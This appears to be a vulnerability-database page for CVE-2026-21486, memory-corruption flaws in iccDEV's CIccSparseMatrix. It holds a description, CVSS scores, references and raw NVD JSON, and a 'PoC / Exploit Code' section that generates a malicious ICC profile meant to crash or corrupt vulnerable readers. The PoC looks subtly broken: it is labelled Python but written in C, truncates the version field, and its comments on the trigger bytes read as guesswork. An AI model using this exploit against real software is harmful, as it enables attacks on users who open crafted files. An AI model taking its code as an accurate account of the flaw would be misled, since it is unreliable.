CVE-2026-21486

Description

iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1.1 and below contain Use After Free, Heap-based Buffer Overflow and Integer Overflow or Wraparound and Out-of-bounds Write vulnerabilities in its CIccSparseMatrix::CIccSparseMatrix function. This issue is fixed in version 2.3.1.2.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:* - VULNERABLE

iccDEV <= 2.3.1.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// PoC for CVE-2026-21486 - iccDEV CIccSparseMatrix Memory Corruption
// This PoC creates a malicious ICC profile that triggers the vulnerability

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// ICC Profile Header structure
typedef struct {
    uint32_t size;
    uint8_t  signature[4];        // 'acsp'
    uint32_t reserved;
    uint8_t  color_space[4];
    uint8_t  pcs[4];
    uint16_t version;
    uint16_t profile_class;
    uint32_t datetime[3];
    uint8_t  magic[4];
    uint32_t platform;
    uint32_t flags;
    uint32_t manufacturer;
    uint32_t model;
    int64_t  attributes;
    uint32_t rendering_intent;
    uint32_t illuminant[2];
    uint32_t creator;
    uint32_t profile_id[4];
    uint8_t  reserved2[28];
} ICC_HEADER;

// Malicious tag data to trigger CIccSparseMatrix vulnerability
unsigned char malicious_sparse_matrix_tag[] = {
    // Tag type signature for sparse matrix
    0x6D, 0x61, 0x74, 0x66,  // 'matf' - sparse matrix type
    0x00, 0x00, 0x00, 0x00,  // Reserved
    // Sparse matrix header with crafted values
    0xFF, 0xFF, 0xFF, 0xFF,  // Integer overflow trigger (rows = -1)
    0x00, 0x00, 0x10, 0x00,  // Columns = 4096
    0x00, 0x00, 0x00, 0x00,  // flags
    // Crafted sparse matrix data to trigger buffer overflow
    0x00, 0x00, 0x00, 0x10,  // Large value for array size
    0xFF, 0xFF, 0xFF, 0xFF,  // Negative offset for use-after-free
    0x41, 0x41, 0x41, 0x41   // Padding/overflow data
};

int create_malicious_icc_profile(const char* filename) {
    FILE* fp = fopen(filename, "wb");
    if (!fp) return -1;
    
    ICC_HEADER header = {0};
    header.size = 128 + sizeof(malicious_sparse_matrix_tag);
    memcpy(header.signature, "acsp", 4);
    header.version = 0x04000000;
    memcpy(header.magic, "\x00\x00\x00\x00", 4);
    
    fwrite(&header, sizeof(ICC_HEADER), 1, fp);
    fwrite(malicious_sparse_matrix_tag, sizeof(malicious_sparse_matrix_tag), 1, fp);
    
    fclose(fp);
    return 0;
}

int main() {
    printf("CVE-2026-21486 PoC - iccDEV CIccSparseMatrix\n");
    printf("Generating malicious ICC profile...\n");
    
    if (create_malicious_icc_profile("malicious_profile.icc") == 0) {
        printf("Malicious ICC profile created: malicious_profile.icc\n");
        printf("Open with vulnerable iccDEV version to trigger vulnerability\n");
    }
    
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-21486
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-21486
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-21486/
[4] VulDB https://vuldb.com/cve/CVE-2026-21486
[5] https://github.com/InternationalColorConsortium/iccDEV/commit/1ab7363f38a20089934d3410c88f714eea392bf5
[6] https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-mg98-j5q2-674w

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-21486", "sourceIdentifier": "[email protected]", "published": "2026-01-06T04:15:53.960", "lastModified": "2026-01-12T20:59:22.500", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1.1 and below contain Use After Free, Heap-based Buffer Overflow and Integer Overflow or Wraparound and Out-of-bounds Write vulnerabilities in its CIccSparseMatrix::CIccSparseMatrix function. This issue is fixed in version 2.3.1.2."}, {"lang": "es", "value": "iccDEV proporciona un conjunto de bibliotecas y herramientas para trabajar con perfiles de gestión de color ICC. Las versiones 2.3.1.1 e inferiores contienen vulnerabilidades de Uso después de liberación, desbordamiento de búfer basado en montículo, desbordamiento de entero o ajuste, y escritura fuera de límites en su función CIccSparseMatrix::CIccSparseMatrix. Este problema está corregido en la versión 2.3.1.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-122"}, {"lang": "en", "value": "CWE-190"}, {"lang": "en", "value": "CWE-416"}, {"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.2", "matchCriteriaId": "D34CF745-E75A-4F1C-AD7B-9AC1A2E9F680"}]}]}], "references": [{"url": "https://github.com/InternationalColorConsortium/iccDEV/commit/1ab7363f38a20089934d3410c88f714eea392bf5", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-mg98-j5q2-674w", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}